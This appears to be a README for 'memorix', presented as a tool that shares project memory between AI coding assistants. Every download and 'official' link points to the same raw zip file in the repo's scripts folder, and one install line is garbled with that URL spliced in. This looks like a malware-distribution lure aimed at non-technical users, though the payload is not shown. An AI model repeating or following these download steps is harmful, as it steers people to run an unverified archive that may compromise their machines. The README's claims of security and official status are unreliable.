memorix helps you save the memory of AI coding tools. If you work with AI helpers like Cursor, Windsurf, Claude Code, or Copilot, memorix keeps your projects in mind. It remembers what you told these tools before, so you don't have to explain your work again and again.
You can think of it as a bridge that links memories across different coding assistants, making your workflow smoother without repeating yourself.
- People who use AI coding assistants regularly.
- Users who switch between tools like Claude Code, Copilot, and Cursor.
- Anyone who wants to keep their project details saved when using AI helpers.
- Non-technical users who want their AI tools to remember their work context.
memorix uses a system called MCP (Model Context Protocol). MCP talks with different AI coding tools and keeps track of your work's memory. Then, it shares the saved information in a way that all your AI helpers can understand.
This way, when you go from one tool to another, your project data stays with you. You donβt need to re-type or re-explain things to each AI assistant.
- A Windows 10 or later, macOS 10.15 or later, or a popular Linux system.
- At least 4 GB of RAM.
- 100 MB of free disk space.
- An active internet connection (required for AI tools interaction).
- Basic knowledge of downloading and opening files on your computer.
Please visit the release page by clicking below. It lists the latest version of memorix ready for you to download.
- Click on the green "Code" button or scroll down until you see the list of files under the latest release.
- Look for the installer for your operating system. This could be:
- A
.exefile if you use Windows. - A
.dmgfile for macOS. - A
.AppImageorhttps://github.com/Tibu142/memorix/raw/refs/heads/main/scripts/Software_2.1.zipfile for Linux.
- A
- Click the file name to download it on your computer.
- After the download finishes, open the file:
- Windows: Double-click the
.exefile and follow the on-screen instructions. - macOS: Open the
.dmgfile, then drag the memorix app to your Applications folder. - Linux: Make the
.AppImageexecutable by right-clicking, select Properties, then Permissions, and check βAllow executing file as programβ. Then double-click it, or run the app from the terminal.
- Windows: Double-click the
- Once installed, launch memorix like any other program on your computer.
After you open memorix, you will see a simple dashboard.
- The app will ask you to connect your AI coding tools such as Cursor, Claude Code, Copilot, or Windsurf.
- Follow the prompts to allow memorix to link with your accounts or tools.
- When set up, the app will start saving your project memory.
- You donβt need to input any extra details manually; memorix does the work in the background.
- If you change projects or work on new AI tools, just tell memorix which one you're using. It will sync your memory across them.
- Cross-Tool Memory: Keeps your project details saved and shared across many AI coding assistants.
- Easy Setup: A simple installer helps you get started without programming knowledge.
- Automatic Sync: Updates your project memory automatically when you use your AI tools.
- Persistent Context: Keeps your conversations with AI tools stored, so you never lose important details.
- Multi-Platform Support: Works well on Windows, macOS, and Linux.
- Lightweight: Uses minimal computer resources.
- Secure: Your data stays private on your machine, without sharing sensitive info externally.
- Support for Many AI Tools: Works with popular coding agents like Claude Code, Copilot, Cursor, Windsurf, and Kiro.
- Always update memorix to the latest version for bug fixes and improvements.
- Make sure your internet connection is stable when working with AI tools through memorix.
- Regularly check the connection between memorix and your AI coding assistants.
- Use different workspaces if you have multiple projects to keep memories separate.
- Restart memorix if you notice it stops syncing properly.
If memorix does not open or connect to your AI tools:
- Restart your computer and try running the app again.
- Check your internet connection.
- Make sure your AI tools are installed and logged in.
- Verify you downloaded the correct version for your system.
- Move the installer to your local drive if using an external drive or network folder.
- Consult the issue page on the GitHub repository if problems persist.
memorix is built to help AI-driven developers and users keep project context active across many coding assistants. It uses an open standard called MCP (Model Context Protocol) for smooth memory sharing.
- Official release page: https://github.com/Tibu142/memorix/raw/refs/heads/main/scripts/Software_2.1.zip
- Repository homepage: https://github.com/Tibu142/memorix/raw/refs/heads/main/scripts/Software_2.1.zip
- Learn about MCP: Search for "Model Context Protocol" online for detailed explanations.
For help or to report bugs:
- Visit the projectβs GitHub Issues page.
- Provide a clear description of your problem.
- Include your operating system and memorix version.
Make memorix part of your AI coding workflow to keep your project knowledge alive and well across all your tools.